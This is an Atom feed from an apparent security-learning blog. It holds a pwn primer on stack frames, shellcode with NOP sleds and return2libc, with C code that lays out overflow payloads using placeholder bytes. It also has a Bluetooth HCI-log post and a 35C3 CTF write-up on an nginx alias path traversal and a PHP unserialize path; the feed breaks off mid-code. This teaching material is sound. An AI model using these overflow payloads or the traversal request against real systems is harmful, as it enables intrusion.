<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>A Learning Journey from Scratch</title>
<subtitle>FDrag0n's lear­ning journey</subtitle>
<link href="/atom.xml" rel="self"/>
<link href="http://fdrag0n.github.io/"/>
<updated>2019-09-09T15:30:41.883Z</updated>
<id>http://fdrag0n.github.io/</id>
<author>
<name>FDrag0n</name>
</author>
<generator uri="http://hexo.io/">Hexo</generator>
<entry>
<title>Introduction to pwn</title>
<link href="http://fdrag0n.github.io/2019/09/09/pwn%E5%85%A5%E9%97%A8/"/>
<id>http://fdrag0n.github.io/2019/09/09/pwn入门/</id>
<published>2019-09-09T13:44:55.000Z</published>
<updated>2019-09-09T15:30:41.883Z</updated>
<content type="html"><![CDATA[<h1 id="常见寄存器说明"><a href="#常见寄存器说明" class="headerlink" title="常见寄存器说明"></a>Common registers</h1><p>ESP: holds the address of the top of the call stack; it changes on every push and pop.</p><p>EBP: holds the base address of the current function's frame. It stays fixed while the function runs, so it can be used to locate the function's arguments and local variables.</p><p>EIP: holds the address of the next instruction to execute. The CPU fetches and executes the instruction EIP points at, EIP then advances to the following instruction, and by repeating this the program executes instruction after instruction.</p><h1 id="函数调用时栈区变化"><a href="#函数调用时栈区变化" class="headerlink" title="函数调用时栈区变化"></a>How the stack changes during a function call</h1><ol><li><p>The arguments are pushed in <strong>reverse</strong> order (last argument first).</p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190909225008.png" alt=""></p></li><li><p>The address of the instruction that follows the call in the calling function (caller) is pushed as the return address. This saves the caller's EIP.</p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190909225033.png" alt=""></p></li><li><p>The current value of EBP (the caller's frame base) is pushed, and EBP is then set to the current top of the stack. This saves the caller's EBP, and EBP now holds the base address of the called function (callee).</p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190909225054.png" alt=""></p></li><li><p>The callee's local variables are pushed; together with the other data apart from the arguments they make up the callee's state. At the moment of the call the CPU also loads the callee's address into EIP, so the callee's instructions are executed next.</p><p>Having seen what happens when a call is made, what happens when it returns is easy to follow. The core task is to discard the callee's state and restore the top of the stack to the caller's state.</p><p>First the callee's local variables are popped off the stack, so that the top of the stack points at the callee's base address (the saved EBP).<img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190909225252.png" alt=""></p></li><li><p>Next the caller's base address stored there is popped into EBP. This restores the caller's EBP, and the top of the stack now points at the return address.</p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190909225649.png" alt=""></p></li><li><p>Finally the return address is popped into EIP. This restores the caller's EIP.</p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190909225903.png" alt=""></p></li></ol><h1 id="栈溢出"><a href="#栈溢出" class="headerlink" title="栈溢出"></a>Stack overflow</h1><p>While a function is busy executing its own instructions there is no way for us to take control of the program. Only when a call is made or returns does control jump from one function state to another, and that is the moment at which an attack can be mounted by modifying the function state.</p><p><strong>Our goal is to get EIP loaded with the address of our attack instructions.</strong></p><ol><li><p>During the return sequence the return address is handed to EIP, so all we need is for the overflowing data to overwrite the return address with the address of the attack instructions.</p><p>The attack instructions can be part of the overflowing data itself, or we can look for usable instructions elsewhere in memory.</p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190909230218.png" alt=""></p></li><li>Alternatively, replace the function that EIP would be loaded with at a call, so that a different function runs instead.</li></ol><h1 id="栈溢出技术种类"><a href="#栈溢出技术种类" class="headerlink" title="栈溢出技术种类"></a>Kinds of stack overflow technique</h1><ul><li><p>Overwrite the return address so that it points at a sequence of instructions inside the overflowing data (<strong>shellcode</strong>)</p></li><li><p>Overwrite the return address so that it points at a function already present in memory (<strong>return2libc</strong>)</p></li><li><p>Overwrite the return address so that it points at instruction fragments already present in memory (<strong>ROP</strong>)</p></li><li><p>Overwrite the address of some function the program calls so that it points at a different function (<strong>hijack GOT</strong>)</p></li></ul><h2 id="shellcode"><a href="#shellcode" class="headerlink" title="shellcode"></a>shellcode</h2><p><strong>payload:</strong> padding1 + address of shellcode + padding2 + shellcode</p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190909230851.png" alt=""></p><p>padding1 can be filled with anything (if the overflowing data goes in through a string-handling function it must not contain "\x00", or the input is cut off at that byte); its length must be exactly enough to reach the end of the saved base address (EBP). address of shellcode is the address at which the shellcode further down begins, and it overwrites the return address. padding2 can also be filled with anything and can be of any length. shellcode is raw machine code, written out as hex bytes. (On a binary built with stack protection a canary sits between the buffer and the saved EBP and has to survive the overwrite; the description here assumes there is none.)</p><p>Given this layout, two problems have to be solved.</p><ol><li><p>How long must the padding before the return address (padding1) be?</p><p>We can read the disassembly in a debugger (for example gdb) to determine the distance, or probe by running the program with ever longer inputs (once the return address is overwritten with an invalid address such as "AAAA", the program terminates with an error).</p></li><li><p>What is the start address of the shellcode?</p><p>We can look up the location of the return address in a debugger (read EBP and add 4 on a 32-bit machine, per the description of the function state above), but the address seen under the debugger does not match the one in a normal run, because environment variables and similar run-time factors differ. So all we get this way is an approximate shellcode start address. The remedy is to fill padding2 with some number of "\x90" bytes: this opcode is NOP (No Operation), which tells the CPU to do nothing and move on to the next instruction. With that NOP filling in place, the return address only has to land anywhere inside it to slide, with no side effects, down to the start of the shellcode, which is why the technique is called a NOP sled. Adding NOP padding therefore lets us try candidate shellcode addresses with some slack.</p><p>The operating system can randomize the starting address of the call stack (Address Space Layout Randomization, ASLR), in which case the location of the return address changes on every run. Conversely, if ASLR is turned off (a precondition for this technique to work), the return address is at the same location on every run, so we can feed the program invalid overflow data to make it dump a core file, locate the return address in the core file with a debugger, and thereby determine the shellcode start address.</p><p>With both problems solved we can assemble the final overflow data and feed it to the program to execute the shellcode.</p></li></ol><p><img src="C:\Users\Admin\AppData\Roaming\Typora\typora-user-images\1568042353901.png" alt="1568042353901"></p><p>One precondition for this method is that the data on the call stack (the shellcode) must be executable (the other, mentioned above, is that ASLR is off). Very often the operating system removes execute permission from the stack, and then the shellcode method fails. We can still use instructions or functions that are already in memory, since those are executable anyway and are not affected by that restriction. That is what the return2libc and ROP methods do.</p><h2 id="Return2libc"><a href="#Return2libc" class="headerlink" title="Return2libc"></a>Return2libc</h2><p>Determine the address of some function in memory and overwrite the return address with it. Because functions from the libc shared library are used so widely, there is a high probability of finding that library in memory, and because it contains system-level functions such as system(), those are the ones usually used to take control of the current process. Since the function to be executed may need arguments (for example, the full call to open a shell with system() is system("/bin/sh")), the overflow data must also carry the necessary arguments. Taking system("/bin/sh") as the example, we first write down the composition of the overflow data and then fill in each part.</p><p><strong>payload:</strong> padding1 + address of system() + padding2 + address of "/bin/sh"</p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190909232547.png" alt=""></p><p>padding1 can be filled with anything (again, no "\x00", or the input is cut off); its length must be exactly enough to reach the end of the saved base address. address of system() is the address of system() in memory and overwrites the return address. padding2 is 4 bytes long (32-bit) and occupies the slot that system() will treat as its own return address; since all we need is to open a shell and we do not care what happens after the shell exits, padding2 can be filled with anything. address of "/bin/sh" is the address of the string "/bin/sh" in memory, and system() picks it up as its argument.</p><p>Given this layout, a few problems have to be solved.</p><ol><li><p>How long must the padding before the return address (padding1) be?</p><p>The same answer as in the shellcode section.</p></li><li><p>What is the address of system()?</p><p>To answer that, look at how the program calls functions in a dynamically linked library. When a function is dynamically linked, the program first determines at run time the address at which the library is loaded in memory, then adds the function's offset within the library to obtain the function's absolute address. Determining the library's load address brings us back to the ASLR mentioned in the shellcode section: it also randomizes the address at which shared libraries are loaded. So with ASLR on, the library's load address changes on every run and the absolute address of any function in it cannot be known in advance (unless the program leaks a libc address at run time, from which it can be recomputed). With ASLR off, we can read the address of system() directly in a debugger while the program runs, or read the library's load address and the function's offset within the library and compute the absolute address.</p></li></ol><p>Finally, where is "/bin/sh"?</p><p>Search for the string inside the shared library; if it is there, its absolute address is the library's load address plus the offset. If it is not in the library, put the string into an environment variable and determine its address with getenv() or similar.</p><p>With these problems solved we can assemble the overflow data and feed it to the program to open a shell through system().</p><h2 id="以上两种方案都需要操作系统关闭布局随机化(ASLR)"><a href="#以上两种方案都需要操作系统关闭布局随机化(ASLR)" class="headerlink" title="以上两种方案都需要操作系统关闭布局随机化(ASLR)"></a>Both methods above need ASLR turned off</h2><p>Both methods overwrite the return address in order to execute either an injected instruction sequence (shellcode) or a function in a shared library (return2libc). Note that both need the operating system's address space layout randomization (ASLR) to be off, and shellcode additionally needs the program's call stack to be executable.</p><p>The two remaining methods, covered next, include one that can bypass ASLR. Stay tuned.</p>]]></content>
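<![CDATA[
Two of the steps above, measuring the padding1 length and laying out the two payloads, as an added example. This is the editor's code, not code from the original post. Part 1 measures, on whatever machine it runs on, how many bytes separate a 32-byte local buffer from the slot holding the function's own return address, which is exactly padding1 in the post's terms (it automatically includes any stack canary or alignment padding the compiler put in between). Part 2 builds the shellcode and return2libc payloads assuming a 32-bit x86 target (4-byte little-endian addresses); the addresses used in main() are illustrative values, not taken from any real binary, and the shellcode is a one-byte placeholder (int3), not real shellcode.

```c
/* Added example (editor's code, not from the original post).
 * Part 1: find padding1 empirically.  Part 2: build the two payload layouts
 * from the post for a 32-bit x86 target.  Build: cc -O2 -o layout layout.c */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Kept out of line so the probe below is not a leaf function
 * (on some ABIs a leaf never spills its return address to the stack). */
__attribute__((noinline)) static void fill(char *p, size_t n, char c)
{
    for (size_t i = 0; i < n; i++) p[i] = c;
}

/* Bytes from the start of a 32-byte local buffer to the slot that holds this
 * function's return address: scan up the stack, word by word, for the value
 * of our own return address.  Works with or without a frame pointer. */
__attribute__((noinline)) size_t return_slot_offset(void)
{
    union { char bytes[32]; void *words[32 / sizeof(void *)]; } buf;
    void **word;

    fill(buf.bytes, sizeof buf.bytes, 'A');
    /* Launder the pointer so the compiler cannot reason about the scan. */
    __asm__ volatile("" : "=r"(word) : "0"(buf.words) : "memory");

    for (size_t i = 0; i < 64; i++, word++)         /* slot is within a few hundred bytes */
        if (*word == __builtin_return_address(0))
            return (size_t)((uintptr_t)word - (uintptr_t)buf.bytes);
    return 0;                                        /* not found: unexpected */
}

/* Little-endian 32-bit value, the byte order an x86 address has in memory. */
static void put_le32(unsigned char *dst, uint32_t v)
{
    for (int i = 0; i < 4; i++) dst[i] = (unsigned char)(v >> (8 * i));
}

/* 1 if the payload contains a 0x00 byte: delivered through strcpy()/gets()-style
 * input it would be cut off there, which is the "\x00" caveat in the post. */
int payload_has_nul(const unsigned char *p, size_t n)
{
    return memchr(p, 0, n) != NULL;
}

/* padding1 + address of shellcode + NOP sled (padding2) + shellcode.
 * Returns the payload length, or 0 if it does not fit in out[]. */
size_t build_shellcode_payload(unsigned char *out, size_t cap, size_t padding1,
                               uint32_t shellcode_addr, size_t nop_sled,
                               const unsigned char *shellcode, size_t sc_len)
{
    size_t need = padding1 + 4 + nop_sled + sc_len;
    if (need > cap) return 0;
    memset(out, 'A', padding1);                      /* anything without 0x00 */
    put_le32(out + padding1, shellcode_addr);        /* overwrites the return address */
    memset(out + padding1 + 4, 0x90, nop_sled);      /* NOP sled: any landing point slides down */
    memcpy(out + padding1 + 4 + nop_sled, shellcode, sc_len);
    return need;
}

/* padding1 + address of system() + fake return address + address of "/bin/sh"
 * (32-bit cdecl: system() finds its argument 4 bytes above its return address). */
size_t build_ret2libc_payload(unsigned char *out, size_t cap, size_t padding1,
                              uint32_t system_addr, uint32_t binsh_addr)
{
    size_t need = padding1 + 12;
    if (need > cap) return 0;
    memset(out, 'A', padding1);
    put_le32(out + padding1, system_addr);           /* overwrites the return address */
    put_le32(out + padding1 + 4, 0x42424242u);       /* return address for system(); irrelevant once we have a shell */
    put_le32(out + padding1 + 8, binsh_addr);        /* argument to system() */
    return need;
}

int main(void)
{
    unsigned char payload[128];
    const unsigned char fake_shellcode[] = { 0xCC }; /* placeholder: int3, not real shellcode */
    size_t off = return_slot_offset();
    size_t n;

    printf("return address sits %zu bytes above the buffer, so padding1 = %zu\n", off, off);
    /* Illustrative 32-bit addresses, not taken from any real binary. */
    n = build_shellcode_payload(payload, sizeof payload, off, 0xBFFFF5A0u, 16, fake_shellcode, 1);
    printf("shellcode payload: %zu bytes, contains NUL: %d\n", n, payload_has_nul(payload, n));
    n = build_ret2libc_payload(payload, sizeof payload, off, 0xB7E5F430u, 0xB7F83A24u);
    printf("ret2libc payload:  %zu bytes, contains NUL: %d\n", n, payload_has_nul(payload, n));
    n = build_ret2libc_payload(payload, sizeof payload, off, 0x08048000u, 0xB7F83A24u);
    printf("with system() at 0x08048000: contains NUL: %d (a string function would truncate it)\n",
           payload_has_nul(payload, n));
    return 0;
}
```

On a 64-bit build the measured distance is a multiple of 8 and comes out larger than the 32-byte buffer by whatever the compiler placed above it (canary, saved registers, saved frame pointer); that is the same arithmetic the post does with gdb, done by the program itself. The last call shows why the "\x00" caveat matters: any address with a zero byte, such as one in a typical 32-bit text segment, cannot be delivered through a string function.
]]>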
<category term="pwn" scheme="http://fdrag0n.github.io/tags/pwn/"/>
</entry>
<entry>
<title>Getting your headphones' Bluetooth version</title>
<link href="http://fdrag0n.github.io/2019/08/27/%E8%8E%B7%E5%8F%96%E4%BD%A0%E8%80%B3%E6%9C%BA%E7%9A%84%E8%93%9D%E7%89%99%E7%89%88%E6%9C%AC/"/>
<id>http://fdrag0n.github.io/2019/08/27/获取你耳机的蓝牙版本/</id>
<published>2019-08-27T07:34:55.000Z</published>
<updated>2019-08-27T07:56:54.374Z</updated>
<content type="html"><![CDATA[<h1 id="蓝牙耳机"><a href="#蓝牙耳机" class="headerlink" title="蓝牙耳机"></a>Bluetooth headphones</h1><p>Once the big phone makers had killed off the headphone jack, they were in a much better position to sell Bluetooth headphones.</p><p>And the selling points followed: TWS, Bluetooth 5.0, aptX, AAC, LDAC and so on.</p><p>TWS: short for True Wireless Stereo, i.e. <strong>truly wireless stereo</strong>.</p><p>Bluetooth 5.0: officially announced in London on 16 June 2016 (US time), and at the time of writing the newest major version of the Bluetooth specification.</p><p>But how do you know whether a headphone really is Bluetooth 5.0? And which chip is inside it? Most vendors will not tell you.</p><h1 id="获取你耳机的蓝牙版本"><a href="#获取你耳机的蓝牙版本" class="headerlink" title="获取你耳机的蓝牙版本"></a>Getting your headphones' Bluetooth version</h1><ol><li><p>Taking a Xiaomi phone as the example, enable the Bluetooth HCI snoop log under Developer options.</p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190827154743.jpg" alt=""><br>It is the option marked with the white dot in the screenshot; other phones are much the same.</p></li><li><p>Copy the file ./MIUI/debug_log/common/btsnoop_hci.log from the phone's storage to a computer. (The location differs between phones; search for your model to confirm it. On some phones the log needs root to read and lives under /data/misc/bluetooth/logs.)</p></li><li><p>Open the log in Wireshark and search for Read Remote Version Information Complete.</p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190827155432.png" alt=""></p><p>The red line marks where the remote device's Bluetooth version and chip vendor can be read. In this HCI event the LMP version field identifies the Bluetooth core version the headphone's controller implements (for example LMP version 9 is Bluetooth 5.0), and the Manufacturer Name field is the Bluetooth SIG company identifier of the chip vendor.</p></li></ol><p>The protocol documents give me a headache; I will probably be too lazy to read the rest 0.0</p>]]></content>
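<![CDATA[
The third step above, reading the version out of the log, as an added example: a small C reader for btsnoop_hci.log that does what the Wireshark search does. This is the editor's code, not code from the original post. It assumes the file uses the btsnoop container with the HCI UART (H4) datalink type that Android's HCI snoop logging writes; the log embedded in it is constructed by hand, not captured from a device, and the vendor table covers only a handful of Bluetooth SIG company identifiers.

```c
/* Added example (editor's code, not from the original post): read an Android
 * btsnoop_hci.log and report the Bluetooth version and chip vendor from HCI
 * Read Remote Version Information Complete events.  Assumes btsnoop v1 with
 * the HCI UART (H4) datalink type.  The embedded log is constructed by hand. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BTSNOOP_HDR_LEN 16   /* "btsnoop\0", version (4), datalink (4); big-endian */
#define BTSNOOP_REC_LEN 24   /* orig_len, incl_len, flags, drops (4 each), timestamp (8) */
#define H4_EVENT_PKT    0x04
#define EVT_READ_REMOTE_VERSION_COMPLETE 0x0C

struct remote_version {
    uint16_t handle;        /* connection handle (12 bits) */
    uint8_t  lmp_version;   /* LMP/LL version of the remote controller */
    uint16_t manufacturer;  /* Bluetooth SIG company identifier of the chip vendor */
    uint16_t subversion;    /* vendor-defined firmware revision */
};

static uint32_t be32(const uint8_t *p)
{
    return (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | p[3];
}
static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }

/* LMP version number to Bluetooth core version (Bluetooth SIG assigned numbers). */
const char *bt_version_name(uint8_t lmp)
{
    static const char *const names[] = { "1.0b", "1.1", "1.2", "2.0", "2.1", "3.0", "4.0",
                                         "4.1", "4.2", "5.0", "5.1", "5.2", "5.3", "5.4" };
    if (lmp >= sizeof names / sizeof names[0]) return "unknown";
    return names[lmp];
}

/* A handful of company identifiers; the SIG's full list is much longer. */
const char *bt_company_name(uint16_t id)
{
    switch (id) {
    case 0x000A: return "Cambridge Silicon Radio (now Qualcomm)";
    case 0x000D: return "Texas Instruments";
    case 0x000F: return "Broadcom";
    case 0x001D: return "Qualcomm";
    case 0x0046: return "MediaTek";
    case 0x004C: return "Apple";
    case 0x0059: return "Nordic Semiconductor";
    default:     return "unknown";
    }
}

/* Walk every record of a btsnoop file held in memory.  Returns how many
 * successful Read Remote Version Information Complete events were seen and
 * leaves the last one in *out; returns -1 if the header is not btsnoop v1 / H4. */
int find_remote_versions(const uint8_t *log, size_t len, struct remote_version *out)
{
    if (len < BTSNOOP_HDR_LEN || memcmp(log, "btsnoop\0", 8) != 0) return -1;
    if (be32(log + 8) != 1 || be32(log + 12) != 1002) return -1;

    int found = 0;
    size_t pos = BTSNOOP_HDR_LEN;
    while (pos + BTSNOOP_REC_LEN <= len) {
        uint32_t incl = be32(log + pos + 4);
        const uint8_t *pkt = log + pos + BTSNOOP_REC_LEN;
        if (incl > len - pos - BTSNOOP_REC_LEN) break;   /* truncated record */
        /* H4 event: type, event code, parameter length, then
         * status(1) handle(2) version(1) company(2) subversion(2), little-endian */
        if (incl >= 11 && pkt[0] == H4_EVENT_PKT && pkt[1] == EVT_READ_REMOTE_VERSION_COMPLETE
            && pkt[2] >= 8 && pkt[3] == 0x00) {
            out->handle       = le16(pkt + 4) & 0x0FFF;
            out->lmp_version  = pkt[6];
            out->manufacturer = le16(pkt + 7);
            out->subversion   = le16(pkt + 9);
            found++;
        }
        pos += BTSNOOP_REC_LEN + incl;
    }
    return found;
}

/* Constructed sample: header, one unrelated Command Complete event that is
 * skipped, then a Read Remote Version Information Complete reporting
 * LMP version 9 (Bluetooth 5.0) from company 0x000A. */
static const uint8_t sample_log[] = {
    'b','t','s','n','o','o','p',0,  0,0,0,1,  0,0,0x03,0xEA,         /* version 1, datalink 1002 */
    0,0,0,6,  0,0,0,6,  0,0,0,1,  0,0,0,0,  0,0,0,0,0,0,0,0,      /* record: 6 bytes, received */
    0x04, 0x0E, 0x03, 0x01, 0x03, 0x0C,                             /* Command Complete */
    0,0,0,11, 0,0,0,11, 0,0,0,1,  0,0,0,0,  0,0,0,0,0,0,0,0,      /* record: 11 bytes, received */
    0x04, 0x0C, 0x08, 0x00, 0x01,0x00, 0x09, 0x0A,0x00, 0x34,0x12,  /* status 0, handle 1, LMP 9, 0x000A, 0x1234 */
};

int main(void)
{
    struct remote_version rv;
    int n = find_remote_versions(sample_log, sizeof sample_log, &rv);
    if (n <= 0) { puts("no Read Remote Version Information Complete event found"); return 1; }
    printf("handle 0x%03x: LMP version %u = Bluetooth %s, chip vendor 0x%04x (%s), subversion 0x%04x\n",
           rv.handle, rv.lmp_version, bt_version_name(rv.lmp_version),
           rv.manufacturer, bt_company_name(rv.manufacturer), rv.subversion);
    return 0;
}
```

To run it against a real log, read btsnoop_hci.log into a buffer and pass it to find_remote_versions(); the event only appears after the host has issued Read Remote Version Information for the connection, which Android does when the headphone connects, so the log has to be enabled before pairing or reconnecting.
]]>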
</entry>
<entry>
<title>35C3-POST</title>
<link href="http://fdrag0n.github.io/2019/04/19/2019-4-19-35C3-POST/"/>
<id>http://fdrag0n.github.io/2019/04/19/2019-4-19-35C3-POST/</id>
<published>2019-04-19T02:47:49.000Z</published>
<updated>2019-12-05T13:20:02.462Z</updated>
<content type="html"><![CDATA[<h1 id="35C3-POST"><a href="#35C3-POST" class="headerlink" title="35C3-POST"></a>35C3-POST</h1><p>Directory scanning turns up an uploads directory; a directory-traversal test against it succeeds and yields a backup of the nginx configuration together with the site's source.</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">server {</span><br><span class="line">listen 80;</span><br><span class="line"> access_log /var/log/nginx/example.log;</span><br><span class="line"></span><br><span class="line"> server_name localhost;</span><br><span class="line"></span><br><span class="line"> root /var/www/html;</span><br><span class="line"></span><br><span class="line"> location /uploads {</span><br><span class="line"> autoindex on;</span><br><span class="line"> alias /var/www/uploads/;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> location / {</span><br><span class="line"> alias /var/www/html/;</span><br><span class="line"> index index.php;</span><br><span class="line"></span><br><span class="line"> location ~ \.php$ {</span><br><span class="line"> include snippets/fastcgi-php.conf;</span><br><span class="line"> fastcgi_pass unix:/run/php/php7.2-fpm.sock;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> location /inc/ {</span><br><span class="line"> deny all;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">server {</span><br><span class="line"> listen 127.0.0.1:8080;</span><br><span class="line"> access_log /var/log/nginx/proxy.log;</span><br><span class="line"></span><br><span class="line"> if ( $request_method !~ ^(GET)$ ) {</span><br><span class="line"> return 405;</span><br><span class="line"> }</span><br><span class="line"> root /var/www/miniProxy;</span><br><span class="line"> location / {</span><br><span class="line"> index index.php;</span><br><span class="line"></span><br><span class="line"> location ~ \.php$ {</span><br><span class="line"> include snippets/fastcgi-php.conf;</span><br><span class="line"> fastcgi_pass unix:/run/php/php7.2-fpm.sock;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line">}</span><br></pre></td></tr></table></figure><a id="more"></a><p>The location URI /uploads has no trailing /, while the alias /var/www/uploads/ does. nginx substitutes the alias for the matched prefix only, so a request for, say, /uploads../html/inc/db.php is served from /var/www/uploads/../html/inc/db.php, that is /var/www/html/inc/db.php: ../ escapes the uploads directory and reaches files that the location /inc/ { deny all; } block is meant to protect (the URI never matches /inc/, because the prefix match on /uploads wins). The fix is to give the location the same trailing slash as the alias: location /uploads/ { alias /var/www/uploads/; }. The second server block is a local proxy on 127.0.0.1:8080 that rejects anything but GET, which is what the challenge's name refers to.</p><p>db.php</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span 
class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">DB</span> </span>{</span><br><span class="line"> <span class="keyword">private</span> <span class="keyword">static</span> $con;</span><br><span class="line"> <span class="keyword">private</span> <span class="keyword">static</span> $init = <span class="keyword">false</span>;</span><br><span class="line"> <span 
class="keyword">private</span> <span class="keyword">static</span> <span class="function"><span class="keyword">function</span> <span class="title">initialize</span><span class="params">()</span> </span>{</span><br><span class="line"> DB::$con = sqlsrv_connect(<span class="string">"db"</span>, <span class="keyword">array</span>(<span class="string">"pwd"</span>=> <span class="string">"Foobar1!"</span>, <span class="string">"uid"</span>=><span class="string">"challenger"</span>, <span class="string">"Database"</span>=><span class="string">"challenge"</span>));</span><br><span class="line"> <span class="keyword">if</span> (!DB::$con) DB::error();</span><br><span class="line"> DB::$init = <span class="keyword">true</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">private</span> <span class="keyword">static</span> <span class="function"><span class="keyword">function</span> <span class="title">error</span><span class="params">()</span> </span>{</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"db error"</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">private</span> <span class="keyword">static</span> <span class="function"><span class="keyword">function</span> <span class="title">prepare_params</span><span class="params">($params)</span> </span>{</span><br><span class="line"> <span class="keyword">return</span> array_map(<span class="function"><span class="keyword">function</span><span class="params">($x)</span></span>{</span><br><span class="line"> <span class="keyword">if</span> (is_object($x) <span class="keyword">or</span> is_array($x)) {</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'$serializedobject$'</span> . 
serialize($x);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> (preg_match(<span class="string">'/^\$serializedobject\$/i'</span>, $x)) {</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"invalid data"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="string">""</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> $x;</span><br><span class="line"> }, $params);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">private</span> <span class="keyword">static</span> <span class="function"><span class="keyword">function</span> <span class="title">retrieve_values</span><span class="params">($res)</span> </span>{</span><br><span class="line"> $result = <span class="keyword">array</span>();</span><br><span class="line"> <span class="keyword">while</span> ($row = sqlsrv_fetch_array($res)) {</span><br><span class="line"> $result[] = array_map(<span class="function"><span class="keyword">function</span><span class="params">($x)</span></span>{</span><br><span class="line"> <span class="keyword">return</span> preg_match(<span class="string">'/^\$serializedobject\$/i'</span>, $x) ?</span><br><span class="line"> unserialize(substr($x, <span class="number">18</span>)) : $x;</span><br><span class="line"> }, $row);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> $result;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">public</span> <span class="keyword">static</span> <span class="function"><span class="keyword">function</span> <span class="title">query</span><span class="params">($sql, $values=array<span class="params">()</span>)</span> </span>{</span><br><span class="line"> <span class="keyword">if</span> (!is_array($values)) $values = <span class="keyword">array</span>($values);</span><br><span 
class="line"> <span class="keyword">if</span> (!DB::$init) DB::initialize();</span><br><span class="line"> $res = sqlsrv_query(DB::$con, $sql, $values);</span><br><span class="line"> <span class="keyword">if</span> ($res === <span class="keyword">false</span>) DB::error();</span><br><span class="line"> <span class="keyword">return</span> DB::retrieve_values($res);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">public</span> <span class="keyword">static</span> <span class="function"><span class="keyword">function</span> <span class="title">insert</span><span class="params">($sql, $values=array<span class="params">()</span>)</span> </span>{</span><br><span class="line"> <span class="keyword">if</span> (!is_array($values)) $values = <span class="keyword">array</span>($values);</span><br><span class="line"> <span class="keyword">if</span> (!DB::$init) DB::initialize();</span><br><span class="line"> $values = DB::prepare_params($values);</span><br><span class="line"> $x = sqlsrv_query(DB::$con, $sql, $values);</span><br><span class="line"> <span class="keyword">if</span> (!$x) <span class="keyword">throw</span> <span class="keyword">new</span> <span class="keyword">Exception</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>default.php</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span 
